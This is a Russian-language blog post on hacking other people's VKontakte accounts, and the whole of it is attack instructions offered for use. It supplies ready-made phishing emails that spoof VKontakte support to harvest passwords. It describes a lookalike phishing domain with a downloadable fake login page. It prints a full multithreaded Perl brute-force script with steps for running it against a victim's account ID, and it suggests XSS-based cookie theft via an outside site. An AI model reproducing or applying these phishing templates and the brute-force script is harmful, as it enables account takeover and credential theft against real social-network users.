Взлом контакта


В данный момент очень популярны, стали соц. сети. В этой статье мы рассмотрим одну из них vkontakte.ru.

Очень много людей просят взломать страницу, из своих личных побуждений.

Над такими проектами работают профессионалы, и найти баг уже в состоявшем проекте почти нереально, но всё же редко что то всплывает и поэтому новичку, который нечего не знает, взломать будет НЕРЕАЛЬНО в любом случаи, потому что там сидят далеко не тупые люди и ни кто вам бесплатно помогать, так что смиритесь.

 

Для тех, кто понимает, о чём я, продолжаем.

 

ID это как уник. код юзера, то есть, например серийный номер машины.

Узнать его вы можете, зайдя в вконтакт, например, так выгладит ваша главная страница профиля http://vkontakte.ru/id5185**6?31892

ID получится 5185**6, то есть, то, что начинается от id и то знака ?. Если нету знака ? то идёт до конца.

В данный момент очень популярны, стали соц. сети. В этой статье мы рассмотрим одну из них vkontakte.ru.

Очень много людей просят взломать страницу, из своих личных побуждений.

Над такими проектами работают профессионалы, и найти баг уже в состоявшем проекте почти нереально, но всё же редко что то всплывает и поэтому новичку, который нечего не знает, взломать будет НЕРЕАЛЬНО в любом случаи, потому что там сидят далеко не тупые люди и ни кто вам бесплатно помогать, так что смиритесь.

 

Для тех, кто понимает, о чём я, продолжаем.

 

ID это как уник. код юзера, то есть, например серийный номер машины.

Узнать его вы можете, зайдя в вконтакт, например, так выгладит ваша главная страница профиля http://vkontakte.ru/id5185**6?31892

ID получится 5185**6, то есть, то, что начинается от id и то знака ?. Если нету знака ? то идёт до конца.

 

Некоторые способы взлома:

 

1) Email + СИ -> Пишем анонимное письмо, с указанием отправителя, к примеру \»support@vkontakte.ru\», \»admin@vkontakte.ru\», с текстом типа

Здравствуйте.

В связи с очень высоким количеством пользователей в нашей системе,

идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо,

вам необходимо на него ответить в такой форме:

 

EM: Ваш email в vkontakte.ru.

PA: Ваш пароль в vkontakte.ru.

Пример:

EM: pavel_durov@mail.ru

PA: 123456

 

Чтоб не было путаницы, в теме письма укажите тему \»Обновление\».

 

Приносим извинения за неудобства.

\».

Или типа этого, импровизируйте.

2) Фейк (обман), просто покупаете домен (к примеру, vkontaktte.ru) максимально похожий на vkontakte.ru, например разница в одной букве, и на него сливаете готовый фейк, его возьмете от сюда. vkontakte.zip [4.27 Kb] (cкачиваний: 19107)

3) Email + фейк, Опять же пишем анонимное письмо, но на этот раз наша цель заманить пользователя на фейк, и чтоб он ввёл данные. Отправитель, к примеру \»support@vkontakte.ru\», \»admin@vkontakte.ru\», с текстом типа

Здравствуйте.

В связи с очень высоким количеством пользователей в нашей системе,

идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо.

В течение недели вам нужно зайти в систему vkontaktte.ru, и вы будите автоматически занесены, а список активных.

 

Приносим извинения за неудобства.

\».

Или типа этого, импровизируйте.

4) Использовать брутфорсы, ищите в поисковиках, вот например брутфорс на PERL.

 

 

Vkontakte.Ru Brute [FinaL]

Брутфорс акков вконтакте.ру

Сам скрипт брута (Perl):

 

 

 

#!/usr/bin/perl

 

use IO::Socket;

use MD5;

use threads;

use threads::shared;

my @pass : shared;

 

######################################

# C!klodoL

# vkontakte.ru bruteforce with multi-threads

######################################

$dic = \’passl.txt\’; #словарь паролей

$id = 111111; #id цели

$mail = \’mail%40mail.com\’; #мыло, вместо @ вписать %40

$threads = 4; #количество потоков

######################################

 

open (pass, \»<$dic\»);

 

Next:

@pass = pass();

 

for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);}

for(@trl) { $_->join; }

 

sub Brut

{

 

while (@pass){

 

$pass = shift @pass;

 

$md5 = MD5->hexhash($pass);

$sock = IO::Socket::INET->new(Proto=>\’tcp\’,PeerAddr=>\’vkontakte.ru\’,PeerPor t=>80);

print $sock \»HEAD http://vkontakte.ru/ HTTP/1.0rn\».

\»Host: vkontakte.rurn\».

\»Accept: */*rn\».

\»Content-Type: application/x-www-form-urlencodedrn\».

\»User-Agent: Mozillorn\».

\»Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5rn\».

\»Connection: closernrn\»;

$answ = <$sock>;

close $sock;

print \»$pass $answ\»;

if ($answ =~ /302/){

open (good, \’>>good.txt\’);

print good \»$id:$pass:$md5n\»;

print \»$id:$pass:$md5n\»;

close good;

exit;}

}

 

}

 

goto Next;

 

sub pass

{

my (@mas);

while (){

push @mas, $_;

last if (@mas == 400);

}

chomp @mas;

return @mas;

}

 

 

———————————————————————————

 

 

 

Цитата:

 

———————————————————————————

$dic = \’passl.txt\’; #словарь паролей

$id = 111111; #id цели

$mail = \’mail%40mail.com\’; #мыло, вместо @ вписать %40

$threads = 4; #количество потоков

———————————————————————————

 

 

Как запустить скрипт:

 

Цитата:

 

———————————————————————————

1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию.

2. потом копируем текст в текстовый файл из кода выше… меняем id и мыло жертвы на нужное ,сохраняем как brut.txt

3. переименовываем файл из brute.txt в brute.pl

4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt

5. запускаем файл, и радуемся…

6. создастся good.txt, где и будет ваш пасс.

 

 

Vkontakte bruteforce ©serber

vkontakte_bruteforce.rar

 

или

vkontakte.exe

 

Словари тут.

5) Искать уязвимости, тобишь активные XSS и SQl, для кражи кук используйте na-s.ru. Такие уязвимости очень дорого стоят, и выкладывать их нет смысла просить, тем более паблик уязвимости проживут сутки не более.

 

Ну, вот мы рассмотрели 5 способов как можно взломать страницу вконтакте.

 

Если до сих пор не поняли, не судьба 🙂 Лучше мирно сидите там дальше вконтакте.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Перейти к верхней панели